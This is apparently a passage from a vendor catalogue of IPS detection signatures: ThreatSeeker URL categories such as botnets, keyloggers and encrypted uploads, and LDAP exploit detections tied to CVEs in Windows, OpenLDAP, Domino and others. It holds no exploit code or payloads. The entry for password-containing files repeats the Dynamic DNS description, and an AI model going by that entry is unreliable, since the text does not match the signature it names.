About this situation: ThreatSeeker Advanced Malware Payloads
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1210-5242
Description: Protects against inbound network transmissions of payloads intended to exploit a machine. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Botnets

About this situation: ThreatSeeker Botnets
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1210-5242
Description: Sites that host the command-and-control centers for networks of bots that have been installed onto users' computers. (Excludes web crawlers.) This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Compromised-Websites

About this situation: ThreatSeeker Compromised Websites
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1210-5242
Description: Sites that are vulnerable and known to host an injected malicious code or unwanted content. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Custom-Encrypted-Uploads

About this situation: ThreatSeeker Custom-Encrypted Uploads
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1210-5242
Description: Outbound network transmissions of documents, payloads, and data that have been encrypted using custom encryption methods. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Dynamic-DNS

About this situation: ThreatSeeker Dynamic DNS
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1210-5242
Description: Sites that mask their identity using Dynamic DNS services, often associated with advanced persistent threats (APTs). This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Elevated-Exposure

About this situation: ThreatSeeker Elevated Exposure
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1210-5242
Description: Sites that camouflage their true nature or that include elements suggesting latent malicious intent. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Emerging-Exploits

About this situation: ThreatSeeker Emerging Exploits
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1210-5242
Description: Sites found to be hosting known and potential exploit code. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Files-Containing-Passwords

About this situation: ThreatSeeker Files Containing Passwords
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1210-5242
Description: Sites that mask their identity using Dynamic DNS services, often associated with advanced persistent threats (APTs). This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_HTTP-Not-Enough-Replies-After-Continue-Status-Code

About this situation: The engine didn't see enough HTTP server replies after a Continue status code was seen
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1210-5242
Description: The HTTP server sent a Continue Status Code, and later the engine produced a situation indicating that not all necessary Replies were received. This may be an attempt to exploit CVE-2016-3325.
Back to top

LC_HTTP-Version-0.9-Transfer-Encoding-Chunked-Request-Header

About this situation: An HTTP/0.9 request with a Transfer-Encoding: Chunked header was seen
Context: Local Correlation
Severity: 7
Tags: Suspected Attack Related Anomalies
First detected in: sgpkg-ips-1467-5242
Last changed: sgpkg-ips-1467-5242
Description: An HTTP/0.9 request with a Transfer-Encoding: Chunked header was seen. This may indicate an attempt to exploit CVE-2022-21907.
Back to top

LC_Keyloggers

About this situation: ThreatSeeker Keyloggers
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1210-5242
Description: Sites that download programs that record all keystrokes, and which may send those keystrokes (potentially including passwords or confidential information) to an external party. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Malicious-Embedded-Iframe

About this situation: ThreatSeeker Malicious Embedded iFrame
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1210-5242
Description: Sites infected with a malicious iframe. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Malicious-Embedded-Link

About this situation: ThreatSeeker Malicious Embedded Link
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1210-5242
Description: Sites infected with a malicious link. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Malicious-Websites

About this situation: ThreatSeeker Malicious Websites
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1210-5242
Description: Sites containing code that may intentionally modify users' systems without their consent and cause harm. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Mobile-Malware

About this situation: ThreatSeeker Mobile Malware
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1210-5242
Description: Protects against malicious websites and applications designed to run on mobile devices. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Newly-Registered-Websites

About this situation: ThreatSeeker Newly Registered Websites
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1210-5242
Description: Sites whose domain name was registered recently. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Phishing And Other-Frauds

About this situation: ThreatSeeker Phishing and Other Frauds
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1210-5242
Description: Sites that counterfeit legitimate sites to elicit financial or other private information from users. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Potentially-Exploited-Documents

About this situation: ThreatSeeker Potentially Exploited Documents
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1210-5242
Description: Documents containing content with suspicious characteristics that could lead to the exploitation of a machine. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Potentially-Unwanted-Software

About this situation: ThreatSeeker Potentially Unwanted Software
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1210-5242
Description: Sites using technologies that alter the operation of a user's hardware, software or network in ways that diminish control over the user experience, privacy or the collection and distribution of personal information. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Security

About this situation: ThreatSeeker Security
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1210-5242
Description: Forcepoint Security Filtering adds extra protection from web-based threats by providing additional security-related website categories. These allow you to develop policies to block access to sites associated with spyware, phishing, keylogging and malicious mobile code. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Spyware

About this situation: ThreatSeeker Spyware
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1210-5242
Description: Sites that download software that generate HTTP traffic (other than simple user identification and validation) without a user's knowledge. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Suspicious-Content

About this situation: ThreatSeeker Suspicious Content
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1210-5242
Description: Sites found to contain suspicious content. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Suspicious-Embedded-Link

About this situation: ThreatSeeker Suspicious Embedded Link
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1210-5242
Description: Sites suspected of being infected with a malicious link. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LDAP

About this situation: LDAP traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-1159-5242
Description: The Lightweight Directory Access Protocol (LDAP) is an application protocol for accessing and maintaining distributed directory information services over an Internet Protocol (IP) network. Source: Wikipedia
Back to top

LDAP-UDP_CS-Wireshark-CLDAP-Dissector-DOS

About this situation: An attempt to exploit a Wireshark CLDAP Dissector DOS vulnerability detected.
Context: UDP LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wireshark, CVE2011, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-744-5211
Vulnerability: Wireshark-CLDAP-Dissector-DOS
Description:
Back to top

LDAP-UDP_Samba-LDAP-Ad-Dc-Nested-Filter-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: UDP LDAP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Samba, CVE2020, Any Operating System not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1274-5242
Last changed: sgpkg-ips-1317-5242
Vulnerability: Samba-LDAP-Ad-Dc-Nested-Filter-Denial-Of-Service
Description:
Back to top

LDAP-UDP_SS-Microsoft-Windows-CLDAP-Out-Of-Bounds-Read-CVE-2024-49113

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: UDP LDAP Server Stream
Severity: 2
Tags: Windows, Any Hardware, MS2024-12, CVE2024, Windows not specific, Potential Denial of Service
First detected in: sgpkg-ips-1830-5242
Last changed: sgpkg-ips-1848-5242
Vulnerability: Microsoft-Windows-CLDAP-Out-Of-Bounds-Read-CVE-2024-49113
Description:
Back to top

LDAPS

About this situation: LDAPS traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1159-5242
Description: LDAPS is the LDAP protocol run over TLS. This application can only be identified after the TLS connection is decrypted. If decryption is not used in port TCP/636, the LDAPS traffic will be identified as generic TLS traffic.
Back to top

LDAP_CommuniGate-Pro-LDAP-Server-Bind-Request-Buffer-Overflow

About this situation: Buffer overflow exploit against the CommuniGate Pro bind request message processing vulnerability
Context: LDAP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, CommuniGate Pro, CVE2006, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-58-1210
Last changed: sgpkg-ips-1025-5242
Vulnerability: CommuniGate-Pro-LDAP-Server-Bind-Request-Buffer-Overflow
Description:
Back to top

LDAP_CS-IBM-Domino-LDAP-Server-Modifyrequest-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Domino detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Domino, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-1841-5242
Vulnerability: IBM-Domino-LDAP-Server-Modifyrequest-Stack-Buffer-Overflow
Description:
Back to top

LDAP_CS-IBM-Lotus-Domino-LDAP-Bind-Request-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Lotus Domino detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lotus Domino, CVE2011, Any Operating System not specific, Lotus Domino not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1841-5242
Vulnerability: IBM-Lotus-Domino-LDAP-Bind-Request-Integer-Overflow
Description:
Back to top

LDAP_CS-IBM-Lotus-Domino-LDAP-Heap-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in IBM Lotus Domino detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lotus Domino, CVE2010, Any Operating System not specific, Lotus Domino not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-287-4219
Last changed: sgpkg-ips-287-4219
Vulnerability: IBM-Lotus-Domino-LDAP-Heap-Buffer-Overflow
Description:
Back to top

LDAP_CS-IBM-Lotus-Domino-LDAP-Server-Memory-Exception

About this situation: An attempt to exploit a vulnerability in IBM Lotus Domino detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lotus Domino, CVE2006, Any Operating System not specific, Lotus Domino not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: IBM-Lotus-Domino-LDAP-Server-Memory-Exception
Description:
Back to top

LDAP_CS-IBM-Tivoli-Directory-Server-Ibmslapd.exe-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Directory Server detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Directory Server, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-424-4219
Vulnerability: IBM-Tivoli-Directory-Server-Ibmslapd.exe-Integer-Overflow
Description:
Back to top

LDAP_CS-LSASS-Heap-Overflow-CVE-2010-0820

About this situation: Detects attempts to exploit a heap overflow vulnerabity in Windows LSASS
Context: LDAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-09, CVE2010, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-338-4219
Vulnerability: LDAP-LSASS-Heap-Overflow-CVE-2010-0820
Description:
Back to top

LDAP_CS-Microsoft-Active-Directory-Domain-Services-Elevation-Of-Privilege

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected
Context: LDAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Server, MS2021-11, CVE2021, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1427-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Microsoft-Active-Directory-Domain-Services-Elevation-Of-Privilege
Description:
Back to top

LDAP_CS-Microsoft-Active-Directory-LDAP-Query-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: LDAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2008-02, CVE2008, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-1618-5242
Vulnerability: Microsoft-Active-Directory-LDAP-Query-Handling-Denial-Of-Service
Description:
Back to top

LDAP_CS-Microsoft-Windows-Active-Directory-Crafted-LDAP-Request-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: LDAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2007-07, CVE2007, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Windows-Active-Directory-Crafted-LDAP-Request-Buffer-Overflow
Description:
Back to top

LDAP_CS-Microsoft-Windows-Active-Directory-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: LDAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2008-06, CVE2008, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-939-5242
Vulnerability: Microsoft-Windows-Active-Directory-Denial-Of-Service
Description:
Back to top

LDAP_CS-Microsoft-Windows-Active-Directory-Integrated-DNS-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected
Context: LDAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Server, MS2020-09, CVE2020, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1285-5242
Last changed: sgpkg-ips-1285-5242
Vulnerability: Microsoft-Windows-Active-Directory-Integrated-DNS-Remote-Code-Execution
Description:
Back to top

LDAP_CS-Microsoft-Windows-Active-Directory-Ldaps-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: LDAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-11, CVE2011, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Windows-Active-Directory-Ldaps-Authentication-Bypass
Description:
Back to top

LDAP_CS-Microsoft-Windows-ADIDNS-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected.
Context: LDAP Client Stream
Severity: 2
Tags: Windows, Any Hardware, Windows Server, CVE2020, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-1370-5242
Last changed: sgpkg-ips-1370-5242
Vulnerability: Microsoft-Windows-ADIDNS-Information-Disclosure
Description:
Back to top

LDAP_CS-Microsoft-Windows-Domain-User-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: LDAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2016, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-809-5242
Vulnerability: Microsoft-Windows-Domain-User-Code-Execution
Description:
Back to top

LDAP_CS-Microsoft-Windows-LDAP-Remote-Code-Execution-Vulnerability-CVE-2025-21376

About this situation: A vulnerability in Microsoft Windows
Context: LDAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Server, MS2025-02, CVE2025, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1835-5242
Last changed: sgpkg-ips-1835-5242
Vulnerability: Microsoft-Windows-LDAP-Remote-Code-Execution-Vulnerability-CVE-2025-21376
Description:
Back to top

LDAP_CS-Microsoft-Windows-LSASS-Recursive-Stack-Overflow

About this situation: MS09-066
Context: LDAP Client Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows 2000 Server, Windows 2008, Any Hardware, MS2009-11, CVE2009, Windows XP not specific, Windows 2003 not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-348-4219
Vulnerability: Microsoft-Windows-LSASS-Recursive-Stack-Overflow
Description:
Back to top

LDAP_CS-Microsoft_Windows_Memory_Corruption_Vulnerability_CVE-2020-0664

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: LDAP Client Stream
Severity: 10
Tags: Windows, Any Hardware, MS2020-09, CVE2020, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1274-5242
Last changed: sgpkg-ips-1317-5242
Vulnerability: Microsoft_Windows_Memory_Corruption_Vulnerability_CVE-2020-0664
Description:
Back to top

LDAP_CS-MS09-066

About this situation: MS09-066
Context: LDAP Client Stream
Severity: 2
Tags: Windows XP, Windows 2003, Windows 2000 Server, Windows 2008, Any Hardware, MS2009-11, CVE2009, Windows XP not specific, Windows 2003 not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-264-3038
Last changed: sgpkg-ips-371-4219
Vulnerability: Microsoft-Windows-LSASS-Recursive-Stack-Overflow
Description:
Back to top

LDAP_CS-Network-Associates-PGP-Keyserver-Buffer-Overflow

About this situation: An attempt to exploit a Network Associates PGP Keyserver Buffer Overflow vulnerability detected.
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Network Associates PGP Keyserver, CVE2001, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-737-5211
Vulnerability: Network-Associates-PGP-Keyserver-Buffer-Overflow
Description:
Back to top

LDAP_CS-Novell-eDirectory-LDAP-Null-Search-Parameter-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell eDirectory detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell eDirectory, CVE2008, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-525-5211
Vulnerability: Novell-eDirectory-LDAP-Null-Search-Parameter-Buffer-Overflow
Description:
Back to top

LDAP_CS-Novell-eDirectory-LDAP-Null-Search-Parameter-Buffer-Overflow-2

About this situation: An attempt to exploit a vulnerability in Novell eDirectory detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell eDirectory, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-492-5211
Vulnerability: Novell-eDirectory-LDAP-Null-Search-Parameter-Buffer-Overflow
Description:
Back to top

LDAP_CS-Novell-eDirectory-Unchecked-Length-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Novell eDirectory detected
Context: LDAP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Novell eDirectory, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Novell-eDirectory-Unchecked-Length-Denial-Of-Service
Description:
Back to top

LDAP_CS-OpenLDAP-Back-SQL-LDAP-Search-SQL-Injection-Vulnerability

About this situation: An attempt to exploit a vulnerability in OpenLDAP detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenLDAP, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1473-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: OpenLDAP-Back-SQL-LDAP-Search-SQL-Injection-Vulnerability
Description:
Back to top

LDAP_CS-OpenLDAP-BER_get_next-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenLDAP Foundation OpenLDAP detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenLDAP, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: OpenLDAP-BER_get_next-Denial-Of-Service
Description:
Back to top

LDAP_CS-OpenLDAP-ldapsearch-Pagesize-Double-Free-DoS

About this situation: An OpenLDAP ldapsearch Pagesize Double Free DoS vulnerability
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenLDAP, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-937-5242
Last changed: sgpkg-ips-937-5242
Vulnerability: OpenLDAP-ldapsearch-Pagesize-Double-Free-DoS
Description:
Back to top

LDAP_CS-OpenLDAP-Modrdn-Rdn-Null-String-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenLDAP detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenLDAP, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-478-5211
Vulnerability: OpenLDAP-Modrdn-Rdn-Null-String-Denial-Of-Service
Description:
Back to top

LDAP_CS-OpenLDAP-Modrdn-Rdn-UTF-8-String-Code-Execution

About this situation: An attempt to exploit a vulnerability in OpenLDAP Foundation OpenLDAP detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenLDAP, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-1193-5242
Vulnerability: OpenLDAP-Modrdn-Rdn-UTF-8-String-Code-Execution
Description:
Back to top

LDAP_CS-OpenLDAP-Modrdn-Request-Null-Pointer-Dereference

About this situation: An attempt to exploit an OpenLDAP Modrdn Request Null Pointer Dereference Vulnerability detected.
Context: LDAP Client Stream
Severity: 7
Tags: Linux, Any Hardware, OpenLDAP, CVE2010, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-677-5211
Last changed: sgpkg-ips-677-5211
Vulnerability: OpenLDAP-Modrdn-Request-Null-Pointer-Dereference
Description:
Back to top

LDAP_CS-OpenLDAP-Slapd-Cancelrequest-Handling-Infinite-Loop-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenLDAP Foundation OpenLDAP detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenLDAP, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1334-5242
Last changed: sgpkg-ips-1334-5242
Vulnerability: OpenLDAP-Slapd-Cancelrequest-Handling-Infinite-Loop-Denial-Of-Service
Description:
Back to top

LDAP_CS-OpenLDAP-Slapd-Deref-Overlay-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in OpenLDAP Foundation OpenLDAP detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenLDAP, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-647-5211
Vulnerability: OpenLDAP-Slapd-Deref-Overlay-Null-Pointer-Dereference
Description:
Back to top

LDAP_CS-OpenLDAP-Slapd-SASL-Proxy-Authorization-Validation-Assertion-Failure

About this situation: An attempt to exploit a vulnerability in OpenLDAP Foundation OpenLDAP detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenLDAP, CVE2020, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1324-5242
Last changed: sgpkg-ips-1369-5242
Vulnerability: OpenLDAP-Slapd-SASL-Proxy-Authorization-Validation-Assertion-Failure
Description:
Back to top

LDAP_CS-OpenLDAP-Slapd-SASL-Slap_Parse_User-Assertion-Failure

About this situation: An attempt to exploit a vulnerability in OpenLDAP Foundation OpenLDAP detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenLDAP, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1369-5242
Vulnerability: OpenLDAP-Slapd-SASL-Slap_Parse_User-Assertion-Failure
Description:
Back to top

LDAP_CS-OpenLDAP-Slapd-Search-Parsing-Checktime-Assertion-Failure

About this situation: An attempt to exploit a vulnerability in OpenLDAP Foundation OpenLDAP detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenLDAP, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: OpenLDAP-Slapd-Search-Parsing-Checktime-Assertion-Failure
Description:
Back to top

LDAP_CS-OpenLDAP-Slapd-Search-Parsing-Issuerandthisupdatecheck-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in OpenLDAP Foundation OpenLDAP detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenLDAP, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1841-5242
